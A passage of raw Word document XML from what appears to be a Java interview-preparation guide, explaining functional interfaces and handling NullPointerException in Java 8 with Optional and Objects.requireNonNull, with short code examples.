          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> or </w:t>
      </w:r>
      <w:r w:rsidRPr="00397A42">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>method</w:t>
      </w:r>
      <w:r w:rsidRPr="00397A42">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and is used primarily for </w:t>
      </w:r>
      <w:r w:rsidRPr="00397A42">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>lambda expressions</w:t>
      </w:r>
      <w:r w:rsidRPr="00397A42">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> or </w:t>
      </w:r>
      <w:r w:rsidRPr="00397A42">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>method references</w:t>
      </w:r>
      <w:r w:rsidRPr="00397A42">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in Java. If you have more than one abstract method in an interface, it will not be considered a functional interface.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57CBC901"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For example, this interface is valid as a functional interface because it has only one abstract method:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FEB0B7F"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FunctionalInterface</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3724E2B3"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public interface MyFunctionalInterface {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D19C585"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void myMethod();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00BB46A7"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B922526"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However, the following interface is </w:t>
      </w:r>
      <w:r w:rsidRPr="00397A42">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>not</w:t>
      </w:r>
      <w:r w:rsidRPr="00397A42">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> a functional interface because it has </w:t>
      </w:r>
      <w:r w:rsidRPr="00397A42">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>two abstract methods</w:t>
      </w:r>
      <w:r w:rsidRPr="00397A42">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20A7EA4A"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FunctionalInterface</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64D3E2CC"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public interface InvalidFunctionalInterface {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FB0A05D"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void methodOne();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2604CF54"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void methodTwo();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21927E31"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BFFEBE1" w14:textId="77777777" w:rsidR="00B57733" w:rsidRPr="00397A42" w:rsidRDefault="00B57733" w:rsidP="00397A42">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00397A42">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Why Only One Abstract Method?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7408D48D"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The reason behind this is that functional interfaces are used to represent single-method contracts, such as those used by </w:t>
      </w:r>
      <w:r w:rsidRPr="00397A42">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>lambda expressions</w:t>
      </w:r>
      <w:r w:rsidRPr="00397A42">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>. Allowing multiple abstract methods would make it ambiguous which method should be referred to when using a lambda expression.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11CF1FCF" w14:textId="77777777" w:rsidR="00B57733" w:rsidRPr="00397A42" w:rsidRDefault="00B57733" w:rsidP="00397A42">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00397A42">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Default and Static Methods in Functional Interfaces</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="520401F8"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A functional interface </w:t>
      </w:r>
      <w:r w:rsidRPr="00397A42">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>can</w:t>
      </w:r>
      <w:r w:rsidRPr="00397A42">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> have any number of </w:t>
      </w:r>
      <w:r w:rsidRPr="00397A42">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>default</w:t>
      </w:r>
      <w:r w:rsidRPr="00397A42">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidRPr="00397A42">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>static methods</w:t>
      </w:r>
      <w:r w:rsidRPr="00397A42">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, as they are not considered abstract methods. These methods do not affect the "functional" nature of the interface because they have implementations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ECC62A7"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For example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01F19F87"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FunctionalInterface</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D819F16"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public interface MyFunctionalInterface {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60C0ECCE"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void myMethod();  // Abstract method</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64497533" w14:textId="77777777" w:rsidR="00B57733" w:rsidRPr="00397A42" w:rsidRDefault="00B57733" w:rsidP="00397A42">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7122019D"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default void defaultMethod() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40A4C6F1"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System.out.println("This is a default method");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C70DC67"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60C40E84" w14:textId="77777777" w:rsidR="00B57733" w:rsidRPr="00397A42" w:rsidRDefault="00B57733" w:rsidP="00397A42">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5C6DD982"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static void staticMethod() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D3E3E38"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System.out.println("This is a static method");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57E5DD0F"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="285E65E3"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48777C59" w14:textId="77777777" w:rsidR="00B57733" w:rsidRPr="00397A42" w:rsidRDefault="00B57733"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In summary, a functional interface can have multiple default or static methods, but it must have </w:t>
      </w:r>
      <w:r w:rsidRPr="00397A42">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>only one abstract method</w:t>
      </w:r>
      <w:r w:rsidRPr="00397A42">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to remain a functional interface.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A2CC899" w14:textId="4074D017" w:rsidR="00936CAC" w:rsidRPr="00CE4B95"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8E125D3">
          <v:rect id="_x0000_i1774" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4044048B" w14:textId="77777777" w:rsidR="001E08D1" w:rsidRPr="00CE4B95" w:rsidRDefault="001E08D1">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="247" w:name="_Toc196307727"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Have you worked on NullPointerException? How to handle NullPointerException in java 8?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="247"/>
    </w:p>
    <w:p w14:paraId="390B538C" w14:textId="2930E78B" w:rsidR="006E761D" w:rsidRPr="00397A42" w:rsidRDefault="006E761D" w:rsidP="00397A42">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>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Yes, </w:t>
      </w:r>
      <w:r w:rsidRPr="00397A42">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>NullPointerException (NPE)</w:t>
      </w:r>
      <w:r w:rsidRPr="00397A42">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is a common exception in Java that occurs when your code attempts to use an object reference that is null. It usually happens when you try to call a method or access a field on a null object, or try to use a null value in a place where an object is expected.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0290E4ED" w14:textId="77777777" w:rsidR="006E761D" w:rsidRPr="00397A42" w:rsidRDefault="006E761D" w:rsidP="00397A42">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00397A42">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>How to Handle NullPointerException in Java 8</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BAAFB05"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In Java 8, several approaches have been introduced to handle NullPointerException more effectively. Here's how you can handle it:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="396C94A9" w14:textId="77777777" w:rsidR="006E761D" w:rsidRPr="00397A42" w:rsidRDefault="006E761D" w:rsidP="00397A42">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00397A42">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>1. Using Optional Class (Java 8)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="158FD774"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The </w:t>
      </w:r>
      <w:r w:rsidRPr="00397A42">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Optional</w:t>
      </w:r>
      <w:r w:rsidRPr="00397A42">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> class is a container object which may or may not contain a non-null value. It is part of Java 8 and helps in avoiding NullPointerException by explicitly handling the presence or absence of a value.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A492CF2"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Here’s an example of using Optional to handle NullPointerException:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="744E1568"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import java.util.Optional;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72981A49" w14:textId="77777777" w:rsidR="006E761D" w:rsidRPr="00397A42" w:rsidRDefault="006E761D" w:rsidP="00397A42">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="503544C0"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public class NPEExample {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="269B58B0" w14:textId="77777777" w:rsidR="006E761D" w:rsidRPr="00397A42" w:rsidRDefault="006E761D" w:rsidP="00397A42">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="30A610BC"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public static void main(String[] args) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DDCC9FF"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String name = null;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A3E2356" w14:textId="77777777" w:rsidR="006E761D" w:rsidRPr="00397A42" w:rsidRDefault="006E761D" w:rsidP="00397A42">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4CDE8311"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 Using Optional to avoid NullPointerException</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F570170"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Optional&lt;String&gt; optionalName = Optional.ofNullable(name);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17DEEC7F" w14:textId="77777777" w:rsidR="006E761D" w:rsidRPr="00397A42" w:rsidRDefault="006E761D" w:rsidP="00397A42">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5E239090"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 Using ifPresent() method to check if the value is present</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="156DC8A5"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optionalName.ifPresent(n -&gt; System.out.println("Name length: " + n.length()));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FB71DBC" w14:textId="77777777" w:rsidR="006E761D" w:rsidRPr="00397A42" w:rsidRDefault="006E761D" w:rsidP="00397A42">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1EFC8D31"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 Using orElse() to provide a default value if null</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59C146BF"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String defaultName = optionalName.orElse("Default Name");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66C40532"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System.out.println("Name: " + defaultName);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09083A04" w14:textId="77777777" w:rsidR="006E761D" w:rsidRPr="00397A42" w:rsidRDefault="006E761D" w:rsidP="00397A42">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1BA65FAE"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 Using orElseThrow() to throw a custom exception if value is absent</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58B160D7"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String fetchedName = optionalName.orElseThrow(() -&gt; new IllegalArgumentException("Name cannot be null"));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27DCEEA6"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System.out.println("Fetched Name: " + fetchedName);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61BC2846"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A61FAB2"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BDB3C67" w14:textId="77777777" w:rsidR="006E761D" w:rsidRPr="00397A42" w:rsidRDefault="006E761D" w:rsidP="00397A42">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00397A42">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Explanation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54A92F08" w14:textId="77777777" w:rsidR="006E761D" w:rsidRPr="00397A42" w:rsidRDefault="006E761D" w:rsidP="00397A42">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1069"/>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Optional.ofNullable()</w:t>
      </w:r>
      <w:r w:rsidRPr="00397A42">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Creates an Optional object that can hold a null or non-null value.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="797E2A3B" w14:textId="77777777" w:rsidR="006E761D" w:rsidRPr="00397A42" w:rsidRDefault="006E761D" w:rsidP="00397A42">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1069"/>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ifPresent()</w:t>
      </w:r>
      <w:r w:rsidRPr="00397A42">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Checks if the value is present and executes the given lambda expression if it is.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="782721F3" w14:textId="77777777" w:rsidR="006E761D" w:rsidRPr="00397A42" w:rsidRDefault="006E761D" w:rsidP="00397A42">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1069"/>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orElse()</w:t>
      </w:r>
      <w:r w:rsidRPr="00397A42">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Provides a default value if the Optional is empty (null).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="104E65AF" w14:textId="77777777" w:rsidR="006E761D" w:rsidRPr="00397A42" w:rsidRDefault="006E761D" w:rsidP="00397A42">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1069"/>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orElseThrow()</w:t>
      </w:r>
      <w:r w:rsidRPr="00397A42">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Throws an exception if the Optional is empty.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A9FAE89" w14:textId="77777777" w:rsidR="006E761D" w:rsidRPr="00397A42" w:rsidRDefault="006E761D" w:rsidP="00397A42">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00397A42">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>2. Null Safe Method Calls Using Objects Class</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AF78DF1"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In Java 8, the Objects class provides utility methods to avoid NullPointerException. One such method is Objects.requireNonNull().</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="160D3E08"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import java.util.Objects;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15116677" w14:textId="77777777" w:rsidR="006E761D" w:rsidRPr="00397A42" w:rsidRDefault="006E761D" w:rsidP="00397A42">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5794A77D"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public class NPEExample {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CEA5274"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public static void main(String[] args) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="446A297F"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String name = null;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37C6C2A1" w14:textId="77777777" w:rsidR="006E761D" w:rsidRPr="00397A42" w:rsidRDefault="006E761D" w:rsidP="00397A42">
